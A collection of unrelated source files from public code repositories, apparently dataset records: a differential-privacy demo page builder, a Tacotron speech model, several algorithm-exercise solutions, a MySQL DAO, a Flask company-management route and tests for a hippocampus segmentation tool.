attrib={'class':'dataline2'})\n d2t = TyTag('span', text='f: ', attrib={'class':'datalabel'})\n \n d3 = TyTag('div', attrib={'class':'dataline3'})\n d3t = TyTag('span', text='m: ', attrib={'class':'datalabel'})\n \n if self.editable==True and 'Block' in name:\n attrib = {'type':'text', 'min':'0', 'max':'999', 'size':'3', 'class':'data'}\n d2d = TyTag('input', attrib={**attrib, **{'id':self.id_prefix+level+'-f', 'value':'0'}})\n d3d = TyTag('input', attrib={**attrib, **{'id':self.id_prefix+level+'-m', 'value':'0'}})\n else:\n attrib = {'class':'data'}\n d2d = TyTag('span', text='tbd', attrib={**attrib, **{'id':self.id_prefix+level+'-f'}})\n d3d = TyTag('span', text='tbd', attrib={**attrib, **{'id':self.id_prefix+level+'-m'}})\n\n d2.extend([d2t,d2d])\n d3.extend([d3t,d3d])\n\n return [ d1, d2, d3 ]\n\n def add_matrix(self,doc):\n t = tydoc.tytable()\n tr = t.tbody.add_tag('tr')\n tr.add_tag_elems('td', self.pop_data_fields('Tiny County', 'county'), attrib={'colspan':'6'})\n tr = t.tbody.add_tag('tr')\n tr.add_tag_elems('td', 
self.pop_data_fields('Ruralland ', 'rcounty'), attrib={'colspan':'3', 'class':'ruralcounty'})\n        tr.add_tag_elems('td', self.pop_data_fields('Urbanville', 'ucounty'), attrib={'colspan':'3', 'class':'urbancounty'})\n        tr = t.tbody.add_tag('tr')\n        tr.add_tag_elems('td', self.pop_data_fields('RBlock ', 'b1'), attrib={'class':'ruralblock block'})\n        tr.add_tag_elems('td', self.pop_data_fields('RBlock ', 'b2'), attrib={'class':'ruralblock block'})\n        tr.add_tag_elems('td', self.pop_data_fields('RBlock ', 'b3'), attrib={'class':'ruralblock block'})\n        tr.add_tag_elems('td', self.pop_data_fields('UBlock ', 'b4'), attrib={'class':'urbanblock block'})\n        tr.add_tag_elems('td', self.pop_data_fields('UBlock ', 'b5'), attrib={'class':'urbanblock block'})\n        tr.add_tag_elems('td', self.pop_data_fields('UBlock
', 'b6'), attrib={'class':'urbanblock block'})\n\n doc.append(t)\n return t\n\nif __name__==\"__main__\":\n doc = tydoc.tydoc()\n # https://developers.google.com/speed/libraries/#jquery\n\n for url in REQUIRED:\n # Check if we should use our phantom CDN\n if url.startswith('https:'):\n if LOCALHOST_CDN:\n url = 'http://localhost/cdn/' + os.path.basename(url)\n elif LOCAL_CDN:\n url = 'cdn/' + os.path.basename(url)\n\n if url.endswith('.css'):\n doc.head.add_tag(\"link\", attrib={'rel':'stylesheet','href':url, 'media':'all'})\n elif url.endswith('.js'):\n doc.head.add_tag(\"script\", attrib={'src':url})\n else:\n raise RuntimeError(\"Unknown file type: \"+url)\n\n\n div = doc.body.add_tag(\"div\", attrib={'class':'row'})\n col1 = div.add_tag('div', attrib={'class':'column left'})\n col2 = div.add_tag('div', attrib={'class':'column middle noise'})\n col3 = div.add_tag('div', attrib={'class':'column right'})\n \n col1.add_tag_text('p','Confidential database:')\n MatrixMaker('r', editable=True).add_matrix(col1)\n col2.text=('
'\n                   ' Noise Barrier '\n                   ' '\n                   'ε '\n                   '
' )\n    col3.add_tag_text('p','Published official tabulations:')\n    MatrixMaker('p', editable=False).add_matrix(col3)\n    doc.body.add_tag_text('p','Each rectangle shows the population statistics for a different geographical area. The top is the total population (pop), followed by the number of females (f) and the number of males (m).',attrib={'class':'instructions'})\n    \n    doc.body.add_tag_text('p','ε specifies the privacy loss budget. Click privatize! to re-run the privacy mechanism with a different set of random noises.',attrib={'class':'instructions'})\n    \n    doc.body.add_tag_text('p','Try changing the number of females or males that was counted on a block and see how it changes the official tabulations. Or choose one of the sample scenarios listed below.',attrib={'class':'instructions'})\n    \n    t = tydoc.tytable(attrib={'class':'scenarios'})\n    t.add_head(['select','scenario'])\n\n    for (counts,desc) in SCENARIOS:\n        t.add_data([TyTag('input',attrib={'type':'button',\n                                          'class':'sbutton',\n                                          'counts':counts}),\n                    desc])\n    doc.append(t)\n\n    doc.save(\"demo.html\")\n    \n","repo_name":"simsong/dp-demo","sub_path":"sim-top-down/make_demo.py","file_name":"make_demo.py","file_ext":"py","file_size_in_byte":6500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"27409208241","text":"\"\"\"\nThis module contains a tacotron model that can be reused.\n\"\"\"\n\nimport torch\nfrom torch.nn import (\n    GRU,\n    Dropout,\n    InstanceNorm1d,\n    LeakyReLU,\n    Linear,\n    MaxPool1d,\n    Module,\n    ModuleList,\n)\n\nfrom .layers import AttentionLayer, Conv1dNorm, HighWay\n\n\nclass CBHG(Module):\n    \"CBHG network\"\n\n    def __init__(self, features, proj_size, rnn_size, rnn_layers, K, ns, max_pooling):\n        super().__init__()\n        conv_banks = [\n            Conv1dNorm(\n                in_channels=features,\n                out_channels=features,\n                kernel_size=k,\n                stride=1,\n                padding=k // 2,\n                activation=LeakyReLU(negative_slope=ns),\n            )\n            for k in range(1, 1 + K)\n        ]\n        self.conv_banks = ModuleList(conv_banks)\n        if max_pooling:\n            self.maxpool1d = MaxPool1d(kernel_size=2, stride=1, padding=1)\n        conv_proj = [\n            Conv1dNorm(\n                in_channels=in_size,\n                out_channels=out_size,\n                kernel_size=3,\n                stride=1,\n                padding=1,\n                activation=activ,\n            )\n            for in_size, out_size, activ in zip(\n                (K * features, *proj_size[:-1]),\n                proj_size,\n                [LeakyReLU(negative_slope=ns) for _ in range(len(proj_size) - 1)]\n                + [None],\n            )\n        ]\n        self.conv_proj = ModuleList(conv_proj)\n        self.pre_highway = Linear(in_features=proj_size[-1], out_features=features)\n        self.highways = ModuleList(HighWay(features, ns=ns) for _ in range(4))\n        self.rnn = GRU(\n            input_size=features,\n            hidden_size=rnn_size,\n            num_layers=rnn_layers,\n            bidirectional=True,\n        )\n\n    def forward(self, x):\n        \"Pass through\"\n        # x : batch, features, timesteps\n        timesteps = x.size(-1)\n        outs = torch.cat([conv(x)[..., :timesteps] for conv in self.conv_banks], dim=1)\n        try:\n            outs = self.maxpool1d(outs)[..., :timesteps]\n        except AttributeError:\n            pass\n        for conv in self.conv_proj:\n            outs = conv(outs)\n        outs = outs.permute(2, 0, 1)\n        outs = self.pre_highway(outs)\n        for highway in self.highways:\n            outs = highway(outs)\n        return self.rnn(outs)\n\n\nclass PreNet(Module):\n    \"Encoder's door step\"\n\n    def __init__(self, features, ns):\n        super().__init__()\n        in_features = features[:-1]\n        out_features = features[1:]\n        layers = sum(\n            (\n                (\n                    Linear(in_features=in_size, out_features=out_size),\n                    InstanceNorm1d(num_features=out_size),\n                    LeakyReLU(negative_slope=ns),\n                    Dropout(0.5),\n                )\n                for in_size, 
out_size in zip(in_features, out_features)\n ),\n (),\n )\n self.layers = ModuleList(layers)\n\n def forward(self, x):\n \"Pass through\"\n # Pass through all layers\n for layer in self.layers:\n x = layer(x)\n return x\n\n\nclass Encoder(Module):\n \"Encoder of tactron\"\n\n def __init__(\n self,\n n_channels,\n prenet_units,\n proj_size,\n cbhg_maxpool,\n rnn_size,\n rnn_layers,\n K,\n ns,\n ):\n super().__init__()\n self.prenet = PreNet(features=[n_channels] + list(prenet_units), ns=ns)\n self.cbhg = CBHG(\n features=prenet_units[-1],\n proj_size=proj_size,\n rnn_size=rnn_size,\n rnn_layers=rnn_layers,\n K=K,\n ns=ns,\n max_pooling=cbhg_maxpool,\n )\n\n def forward(self, signal):\n \"Pass through\"\n # signal: (batch, features, timesteps)\n signal = signal.transpose(1, 2)\n processed = self.prenet(signal)\n processed.transpose_(1, 2)\n return self.cbhg(processed)\n\n\nclass Decoder(Module):\n \"Decoder of tactron\"\n\n def __init__(\n self,\n prenet_units,\n hidden_sizes,\n cbhg_maxpool,\n rnn_layers,\n proj_size,\n cbhg_rnn,\n n_channels,\n K,\n R,\n ns,\n ):\n super().__init__()\n prev_rnn, self_rnn = hidden_sizes\n self.prenet_enc = PreNet(features=[2 * prev_rnn] + list(prenet_units), ns=ns)\n self.prenet_dec = PreNet(features=[self_rnn] + list(prenet_units), ns=ns)\n self.prenet_dec_transform = Linear(\n in_features=prenet_units[-1], out_features=2 * prev_rnn\n )\n self.prenet_enc_transform = Linear(\n in_features=prenet_units[-1], out_features=2 * prev_rnn\n )\n self.attn_enc = AttentionLayer(\n input_size=prenet_units[-1], hidden_size=2 * prev_rnn\n )\n self.attn_dec = AttentionLayer(\n input_size=prenet_units[-1], hidden_size=2 * prev_rnn\n )\n self.pre_decoder_rnn = Linear(\n in_features=4 * 2 * prev_rnn, out_features=self_rnn\n )\n self.decoder_rnn = GRU(\n input_size=self_rnn, hidden_size=self_rnn, num_layers=rnn_layers\n )\n # self.decoder_attention = AttentionLayer()\n cbhg_rnn_size, cbhg_rnn_layers = cbhg_rnn\n self.cbhg = CBHG(\n features=self_rnn,\n proj_size=proj_size,\n rnn_size=cbhg_rnn_size,\n rnn_layers=cbhg_rnn_layers,\n K=K,\n ns=ns,\n max_pooling=cbhg_maxpool,\n )\n self.out = Linear(in_features=2 * cbhg_rnn_size, out_features=n_channels)\n self.multiple_frames = Linear(in_features=self_rnn, out_features=R * self_rnn)\n self.R = R\n self.leaky_relu = LeakyReLU(negative_slope=ns)\n\n def forward(self, encoded, state_enc, start_token, starting_states, max_len):\n \"Pass through\"\n assert max_len % self.R == 0\n decoded = [start_token]\n state_dec, _state_dec = starting_states\n state_enc = state_enc.view(state_enc.size(1), -1)\n for _ in range(max_len // self.R):\n current_decoded = torch.cat(decoded, dim=0)\n reduced_encoded = self.prenet_enc(encoded)\n reduced_decoded = self.prenet_dec(current_decoded)\n transformed_encoded = self.prenet_enc_transform(reduced_encoded)\n state_enc, alignment_enc = self.attn_enc(\n reduced_encoded[-1], state_enc, transformed_encoded\n )\n transformed_decoded = self.prenet_dec_transform(reduced_decoded)\n state_dec, alignment_dec = self.attn_dec(\n reduced_decoded[-1], state_dec, transformed_decoded\n )\n concat = torch.cat(\n [state_enc, alignment_enc, state_dec, alignment_dec], dim=-1\n )\n concat = self.leaky_relu(concat)\n concat = self.pre_decoder_rnn(concat)\n concat = self.leaky_relu(concat)\n concat = concat.transpose(0, 1)\n dec_out, _state_dec = self.decoder_rnn(concat, _state_dec)\n dec_out = dec_out + concat\n sizes = dec_out.size()\n dec_out = self.leaky_relu(dec_out)\n dec_out = self.multiple_frames(dec_out)\n dec_out 
= dec_out.view(self.R, *sizes[1:])\n decoded.append(dec_out)\n state_enc, state_dec = state_enc.squeeze(1), state_dec.squeeze(1)\n decoded = torch.cat(decoded[1:], dim=0)\n decoded = decoded.permute(1, 2, 0)\n dec_out, _ = self.cbhg(decoded)\n dec_out = self.leaky_relu(dec_out)\n out = self.out(dec_out)\n return out\n\n\nclass Tacotron(Module):\n \"Tacotron 2 model\"\n\n def __init__(\n self,\n n_channels,\n r,\n ns,\n enc_prenet_units,\n enc_proj_size,\n enc_rnn_size,\n enc_rnn_layers,\n enc_k,\n dec_prenet_units,\n dec_proj_size,\n dec_rnn_size,\n dec_rnn_layers,\n dec_k,\n main_rnn_size,\n main_rnn_layers,\n enc_cbhg_maxpool,\n dec_cbhg_maxpool,\n ):\n super().__init__()\n self.enc = Encoder(\n n_channels=n_channels,\n prenet_units=enc_prenet_units,\n proj_size=enc_proj_size,\n cbhg_maxpool=enc_cbhg_maxpool,\n rnn_size=enc_rnn_size,\n rnn_layers=enc_rnn_layers,\n K=enc_k,\n ns=ns,\n )\n self.dec = Decoder(\n prenet_units=dec_prenet_units,\n hidden_sizes=(enc_rnn_size, main_rnn_size),\n rnn_layers=main_rnn_layers,\n proj_size=dec_proj_size,\n cbhg_maxpool=dec_cbhg_maxpool,\n cbhg_rnn=(dec_rnn_size, dec_rnn_layers),\n n_channels=n_channels,\n K=dec_k,\n R=r,\n ns=ns,\n )\n\n def forward(self, x, max_len, start_token=None, starting_states=None):\n \"Pass through\"\n if start_token is None:\n start_token = x.new_zeros(\n size=[1, len(x), self.dec.decoder_rnn.hidden_size]\n )\n if starting_states is None:\n starting_states = [\n x.new_zeros(size=[len(x), 2 * self.enc.cbhg.rnn.hidden_size]),\n x.new_zeros(\n size=[\n self.dec.decoder_rnn.num_layers,\n len(x),\n self.dec.decoder_rnn.hidden_size,\n ]\n ),\n ]\n encoded, state = self.enc(x)\n decoded = self.dec(\n encoded=encoded,\n state_enc=state,\n start_token=start_token,\n starting_states=starting_states,\n max_len=max_len,\n )\n return decoded.permute(1, 2, 0)\n","repo_name":"rentruewang/cant-hear","sub_path":"src/tacotron.py","file_name":"tacotron.py","file_ext":"py","file_size_in_byte":9806,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"11539515392","text":"n,k = map(int,input().split())\r\ndata = [[0,0]]\r\nfor i in range(n):\r\n data.append(list(map(int,input().split())))\r\n\r\ndp =[ [0]*(k+1) for _ in range(n+1)]\r\n\r\nfor i in range(1,n+1):\r\n for j in range(k+1):\r\n if j < data[i][0]:\r\n dp[i][j] = dp[i-1][j]\r\n else:\r\n dp[i][j] = max(dp[i-1][j], data[i][1]+dp[i-1][j-data[i][0]])\r\nprint(dp[n][k])","repo_name":"HyemIin/algorithm-code-test","sub_path":"백준/Gold/12865. 
평범한 배낭/평범한 배낭.py","file_name":"평범한 배낭.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"9168915236","text":"from basedao import BaseDAO\n\n\nclass SPYVIXHedgeDAO(BaseDAO):\n\n    def __init__(self):\n        BaseDAO.__init__(self)\n\n    def save(self, records):\n        query_template = \"\"\"insert into spy_vix_hedge (trade_date, vix_index, vix_delta,spy_vol,spy_price,spy_option_delta,vix_vol,vix_price,vxx_delta,ratio) values\n                  (str_to_date('{}', '%Y-%m-%d'), {}, {},{},{},{},{},{},{},{})\n                  on duplicate key update vix_index = {}, vix_delta = {}, spy_vol = {}, spy_price = {}, spy_option_delta = {},vix_vol = {},vix_price = {},vxx_delta = {},ratio = {}\"\"\"\n        conn = BaseDAO.get_connection()\n        cursor = conn.cursor()\n\n        for record in records:\n            query = BaseDAO.mysql_format(query_template, record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],record[8],record[9], \\\n                                         record[1], record[2], record[3], record[4], record[5], record[6], record[7], record[8], record[9])\n            self.execute_query(query, cursor)\n        conn.commit()\n        conn.close()\n\n    def select_all(self):\n        query = \"\"\"select * from spy_vix_hedge\"\"\"\n        rows = self.select(query)\n        return rows\n","repo_name":"shmyhero/data-process","sub_path":"dataaccess/spyvixhedgedao.py","file_name":"spyvixhedgedao.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"13998681209","text":"## import random\nfrom time import sleep\nclass TrafficLight:\n    # class attributes\n    #color = [random.randint (\"Red \", \"Yellow ○\", \"Green ☻\") for i in range(0:)] #(1, 2, 3) #(\"Red \", \"Yellow ○\", \"Green ☻\")\n\n    ##color = random.choice([\"Red \", \"Yellow ○\", \"Green ☻\"])\n    __color = [\"Red \", \"Yellow ○\", \"Green ☻\"]\n    # __a_red = \"Red \"\n    # __a_yellow = \"Yellow ○\"\n    # __a_green = \"Green ☻\"\n    # method\n    def running(self):\n        i = 0\n        while i != 3:\n            print(TrafficLight.__color[i])\n            if i == 0:\n                sleep(7)\n            elif i == 1:\n                sleep(2)\n            elif i == 2:\n                sleep(1)\n            i += 1\n\nt = TrafficLight()\nt.running()\n# print(t.__color)\n    #print(color())\nprint(f\"Starting the car♣♥☻☺♦•◘○♠5♣0☺\")\n","repo_name":"nail14/GeekBrains_DZ","sub_path":"home work/DZ_9/DZ_9_1.py","file_name":"DZ_9_1.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"13285002777","text":"\"\"\"\nA teacher is writing a test with n true/false questions, with 'T' denoting true and 'F' denoting false. He wants to confuse the students by maximizing the number of consecutive questions with the same answer (multiple trues or multiple falses in a row).\n\nYou are given a string answerKey, where answerKey[i] is the original answer to the ith question. 
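An aside on the SPYVIXHedgeDAO record above: it splices values into the SQL text through mysql_format. With a stock DB-API driver (e.g. PyMySQL or mysql-connector), the same upsert is usually written with %s placeholders so the driver handles quoting — a hedged sketch trimmed to three columns, with the cursor assumed to come from such a driver:

```python
UPSERT = (
    "insert into spy_vix_hedge (trade_date, vix_index, vix_delta) "
    "values (%s, %s, %s) "
    "on duplicate key update vix_index = values(vix_index), "
    "vix_delta = values(vix_delta)"
)

def save(cursor, records):
    # records: iterable of (trade_date, vix_index, vix_delta) tuples;
    # executemany lets the driver bind and escape each row.
    cursor.executemany(UPSERT, list(records))
```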
In addition, you are given an integer k, the maximum number of times you may perform the following operation:\n\nChange the answer key for any question to 'T' or 'F' (i.e., set answerKey[i] to 'T' or 'F').\nReturn the maximum number of consecutive 'T's or 'F's in the answer key after performing the operation at most k times.\n\nExample 1:\nInput: answerKey = \"TTFF\", k = 2\nOutput: 4\nExplanation: We can replace both the 'F's with 'T's to make answerKey = \"TTTT\".\nThere are four consecutive 'T's.\n\nExample 2:\nInput: answerKey = \"TFFT\", k = 1\nOutput: 3\nExplanation: We can replace the first 'T' with an 'F' to make answerKey = \"FFFT\".\nAlternatively, we can replace the second 'T' with an 'F' to make answerKey = \"TFFF\".\nIn both cases, there are three consecutive 'F's.\n\nExample 3:\nInput: answerKey = \"TTFTTFTT\", k = 1\nOutput: 5\nExplanation: We can replace the first 'F' to make answerKey = \"TTTTTFTT\"\nAlternatively, we can replace the second 'F' to make answerKey = \"TTFTTTTT\".\nIn both cases, there are five consecutive 'T's.\n\n\nConstraints:\nn == answerKey.length\n1 <= n <= 5 * 10^4\nanswerKey[i] is either 'T' or 'F'\n1 <= k <= n\n\nhints:\n1 Can we use the maximum length at the previous position to help us find the answer for the current position?\n2 Can we use binary search to find the maximum consecutive same answer at every position?\n\nanalysis:\nsliding window for adjustable size\nTC: O(N)\n\"\"\"\nimport collections\n\n\nclass MaximizeTheConfusionOfAnExam:\n def maxConsecutiveAnswers(self, answerKey: str, k: int) -> int:\n letter_cnt = collections.Counter()\n res = s = 0\n for e, c in enumerate(answerKey):\n letter_cnt[c] += 1\n while min(letter_cnt['T'], letter_cnt['F']) > k:\n letter_cnt[answerKey[s]] -= 1\n s += 1\n res = max(res, e - s + 1)\n return res\n","repo_name":"DeanHe/Practice","sub_path":"LeetCodePython/MaximizeTheConfusionOfAnExam.py","file_name":"MaximizeTheConfusionOfAnExam.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"6150447499","text":"import numpy as np\nfrom math import pi, sin, cos\n\n\ndef DFT(coeffs):\n n = len(coeffs)\n if n <= 1:\n return coeffs\n A0 = DFT(coeffs[0:: 2])\n T = np.array([(cos(2 * pi * k / n) + 1j * sin(2 * pi * k / n)) \n for k in range(n // 2)])\n A1 = DFT(coeffs[1:: 2]) * T\n return np.hstack((A0 + A1, A0 - A1))\n\n\ncoeffs = list(map(float, input().strip().split()))\nresult = DFT(coeffs)\nprint(' '.join(f'{x.real},{x.imag}' for x in result))","repo_name":"LizaGrebenshchikova/VCS","sub_path":"FFT.py","file_name":"FFT.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14239237059","text":"import logging\nimport platform\nimport subprocess\nimport time\n\nimport click\n\nfrom store_search.stores import QFC, FredMeyer, Safeway, Target, WholeFoods\n\n\nclass Browser:\n logger = logging.getLogger(__name__)\n\n def __init__(self, dry_run=False):\n self.cmd_prefix = None\n self.dry_run = dry_run\n self.configure()\n\n def configure(self):\n p = platform.system()\n if p in [\"Darwin\", \"Linux\"]:\n self.cmd_prefix = [\"open\"]\n elif p in [\"Windows\"]:\n self.cmd_prefix = [\"cmd\", \"/c\", \"start\"]\n\n def open(self, url):\n cmd = self.cmd_prefix + [url]\n self.logger.debug(cmd)\n if not self.dry_run:\n process = subprocess.Popen(\n cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE\n )\n 
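The worked examples in the docstring above double as a quick sanity check for the sliding-window solution (assuming the class is importable as written):

```python
# assumes MaximizeTheConfusionOfAnExam from the record above is importable
s = MaximizeTheConfusionOfAnExam()
assert s.maxConsecutiveAnswers("TTFF", 2) == 4
assert s.maxConsecutiveAnswers("TFFT", 1) == 3
assert s.maxConsecutiveAnswers("TTFTTFTT", 1) == 5
print("all three docstring examples pass")
```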
process.communicate()\n\n\n@click.command()\n@click.option(\"-d\", \"--debug/--no-debug\", default=False)\n@click.option(\"-n\", \"--dry-run/--no-dry-run\", default=False)\n@click.option(\"-p\", \"--pause\", default=0.1, show_default=True, type=float)\n@click.argument(\"product\", nargs=-1)\ndef cli(product, debug, dry_run, pause):\n logger = logging.getLogger(__name__)\n if debug:\n logger.setLevel(logging.DEBUG)\n ch = logging.StreamHandler()\n formatter = logging.Formatter(\n \"{%(filename)s:%(lineno)d} %(levelname)s - %(message)s\"\n )\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n target = Target()\n fred = FredMeyer()\n safeway = Safeway(params={\"zipCode\": 98122})\n wf = WholeFoods(params={\"sort\": \"relevance\", \"store\": 10630})\n qfc = QFC()\n\n product = \" \".join(product)\n browser = Browser(dry_run=dry_run)\n logger.debug(\"created brower\")\n store_list = [qfc, fred, target, wf, safeway]\n for i, store in enumerate(store_list):\n url = store.url(product)\n browser.open(url)\n if not dry_run and not i == len(store_list) - 1:\n time.sleep(pause)\n","repo_name":"taylormonacelli/store_search","sub_path":"grocer.py","file_name":"grocer.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15110603379","text":"#!/usr/bin/env python3\nimport sys\nINF = float(\"inf\")\n\n\ndef solve(N: int, K: int, h: \"List[int]\"):\n h.sort()\n print(min(h[i+K-1]-h[i] for i in range(N-K+1)))\n\n return\n\n\ndef main():\n\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens)) # type: int\n K = int(next(tokens)) # type: int\n h = [int(next(tokens)) for _ in range(N)] # type: \"List[int]\"\n solve(N, K, h)\n\n\nif __name__ == '__main__':\n main()","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc115/C/4921315.py","file_name":"4921315.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"5117560217","text":"from flask import Blueprint, request\nfrom ...constants import USER_ID_TAG, COMPANY_ID_TAG, COMPANY_NAME_TAG, COMPANIES_TAG, TOKEN_TAG\nfrom ..models.company import Company\nfrom ..models.mention import Mention\nfrom ..models.site import SiteAssociation\nfrom ..db import insert_rows, delete_rows\nfrom ..responses import ok_response, bad_request_response, data_response\nfrom ..authentication.authenticate import authenticate, enforce_json\nfrom ...mentions_crawler_celery import enqueue\nfrom .job import tasks, get_tasks_id\nfrom celery.result import AsyncResult\n\ncompany_bp = Blueprint(\"companies\", __name__, url_prefix=\"/\")\n\n\n# Route for updating company names\n@company_bp.route(\"/companies\", methods=[\"PUT\"])\n@enforce_json()\n@authenticate()\ndef update_companies(user):\n body = request.get_json()\n if not body.get(COMPANIES_TAG):\n return bad_request_response(\"Invalid fields\")\n names = body.get(COMPANIES_TAG) \n user_id = user.get(USER_ID_TAG)\n token = request.cookies.get(TOKEN_TAG)\n if len(names) == 0:\n return bad_request_response(\"Must have at least one company name\")\n old_companies = Company.query.filter_by(mention_user_id=user_id).all()\n \n old_names = []\n scraped_companies = []\n new_companies = []\n old_mentions = []\n\n for company in old_companies:\n if company.name not in names:\n scraped_companies.append(company)\n 
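# gather this company's non-favourite mentions so they are removed along with it below\n            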
old_mentions.extend(Mention.query.filter_by(mention_user_id=user_id,\n company=company.id, favourite=False).all())\n old_names.append(company.name)\n \n for name in names:\n if name not in old_names:\n new_companies.append(Company(user_id, name))\n\n if len(old_mentions) > 0:\n result = delete_rows(old_mentions)\n if result is not True:\n return result\n if len(scraped_companies) > 0:\n result = delete_rows(scraped_companies)\n if result is not True:\n return result\n if len(new_companies) > 0:\n result = insert_rows(new_companies)\n if result is not True:\n return result\n associations = SiteAssociation.query.filter_by(mention_user_id=user_id).all()\n for assoc in associations:\n result = enqueue(assoc.site_name, user_id, token, True)\n if tasks.get(get_tasks_id(assoc.site_name, user_id)) is not None:\n del tasks[get_tasks_id(assoc.site_name, user_id)]\n if isinstance(result, AsyncResult):\n tasks[get_tasks_id(assoc.site_name, user_id)] = result\n return ok_response(\"Company names updated!\")\n\n\n@company_bp.route(\"/companies\", methods=[\"GET\"])\n@authenticate()\ndef get_companies(user):\n companies = Company.query.filter_by(mention_user_id=user.get(USER_ID_TAG))\n company_dicts = []\n for company in companies:\n company_dicts.append({COMPANY_ID_TAG: company.id, COMPANY_NAME_TAG: company.name})\n\n return data_response({COMPANIES_TAG: company_dicts})\n","repo_name":"hatchways/team-ginger","sub_path":"server/mentions_crawler_flask/blueprints/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44114455065","text":"import shutil\nfrom pathlib import Path\n\nimport ants\nimport hsf.engines\nimport hsf.factory\nimport hsf.fetch_models\nimport hsf.multispectrality\nimport hsf.roiloc_wrapper\nimport hsf.segment\nimport hsf.uncertainty\nimport pytest\nimport torch\nfrom hsf import __version__\nfrom omegaconf import DictConfig\n\n\ndef test_version():\n assert __version__ == '1.1.3'\n\n\n# SETUP FIXTURES\n@pytest.fixture(scope=\"session\")\ndef models_path(tmpdir_factory):\n \"\"\"Setup tmpdir.\"\"\"\n url = \"https://zenodo.org/record/6457484/files/arunet_3.0.0_single.onnx?download=1\"\n xxh3 = \"71edec9011f7f304\"\n\n tmpdir_path = tmpdir_factory.mktemp(\"hsf\")\n tmpdir_path = Path(tmpdir_path)\n\n # Copy sample mri\n shutil.copy(\"tests/mri/tse.nii.gz\", tmpdir_path / \"tse.nii.gz\")\n shutil.copy(\"tests/mri/mask.nii.gz\", tmpdir_path / \"mask.nii.gz\")\n\n # Download model\n hsf.fetch_models.fetch(tmpdir_path, \"model.onnx\", url, xxh3)\n\n assert xxh3 == hsf.fetch_models.get_hash(tmpdir_path / \"model.onnx\")\n\n return tmpdir_path\n\n\n@pytest.fixture(scope=\"session\")\ndef config(models_path):\n \"\"\"Setup DictConfig.\"\"\"\n configuration = {\n \"files\": {\n \"path\": str(models_path),\n \"pattern\": \"tse.nii.gz\",\n \"mask_pattern\": None,\n \"output_dir\": \"hsf_outputs\",\n },\n \"hardware\": {\n \"engine\": \"onnxruntime\",\n \"engine_settings\": {\n \"execution_providers\": [[\n \"CUDAExecutionProvider\", {\n \"device_id\": 0,\n \"gpu_mem_limit\": 2147483648\n }\n ], \"CPUExecutionProvider\"],\n \"batch_size\": 1\n }\n },\n \"roiloc\": {\n \"roi\": \"hippocampus\",\n \"contrast\": \"t2\",\n \"margin\": [2, 0, 2]\n },\n \"augmentation\": {\n \"flip\": {\n \"axes\": [\"LR\"],\n \"flip_probability\": 0.5,\n },\n \"affine_probability\": 0.8,\n \"affine\": {\n \"scales\": 0.2,\n \"degrees\": 15,\n \"translation\": 3,\n \"isotropic\": False,\n 
},\n \"elastic_probability\": 0.20,\n \"elastic\": {\n \"num_control_points\": 4,\n \"max_displacement\": 4,\n \"locked_borders\": 0\n },\n },\n \"multispectrality\": {\n \"pattern\": None,\n \"same_space\": True,\n \"registration\": {\n \"type_of_transform\": \"AffineFast\"\n }\n },\n \"segmentation\": {\n \"ca_mode\": \"1/2/3\",\n \"models_path\": str(models_path),\n \"models\": {\n \"model.onnx\": {\n \"url\":\n \"https://zenodo.org/record/6457484/files/arunet_3.0.0_single.onnx?download=1\",\n \"xxh3_64\":\n \"71edec9011f7f304\"\n }\n },\n \"segmentation\": {\n \"test_time_augmentation\": True,\n \"test_time_num_aug\": 5\n }\n },\n }\n\n return DictConfig(configuration)\n\n\n@pytest.fixture(scope=\"session\")\ndef deepsparse_inference_engines(models_path):\n \"\"\"Tests that models can be loaded using DeepSparse\"\"\"\n settings = DictConfig({\"num_cores\": 0, \"batch_size\": 2})\n\n engines = hsf.engines.get_inference_engines(models_path,\n engine_name=\"deepsparse\",\n engine_settings=settings)\n\n return list(engines)\n\n\n# TESTS\n# Main script called by the `hsf` command\ndef test_main(config):\n \"\"\"Tests that the main script can be called.\"\"\"\n hsf.engines.print_deepsparse_support()\n hsf.factory.main(config)\n\n\ndef test_main_compute_uncertainty(models_path):\n \"\"\"Tests that the main script can compute uncertainty.\"\"\"\n soft_pred = torch.randn(5, 6, 448, 30, 448)\n soft_pred = torch.softmax(soft_pred, dim=1)\n\n hsf.factory.compute_uncertainty(models_path / \"tse.nii.gz\", soft_pred)\n\n\n# fetch_models\ndef test_fetch_models(models_path, config):\n \"\"\"Tests that models can be (down)loaded\"\"\"\n # Delete the model if it exists\n filepath = models_path / \"model.onnx\"\n filepath.unlink()\n\n with filepath.open(\"w\", encoding=\"utf-8\") as f:\n f.write(\"Dummy model with wrong hash\")\n\n # Redownload when wrong hash\n hsf.fetch_models.fetch_models(models_path, config.segmentation.models)\n\n\n# # ROILoc\ndef test_roiloc(models_path):\n \"\"\"Tests that we can locate and save hippocampi.\"\"\"\n mris = hsf.roiloc_wrapper.load_from_config(models_path, \"tse.nii.gz\")\n assert mris\n\n mri, mask = 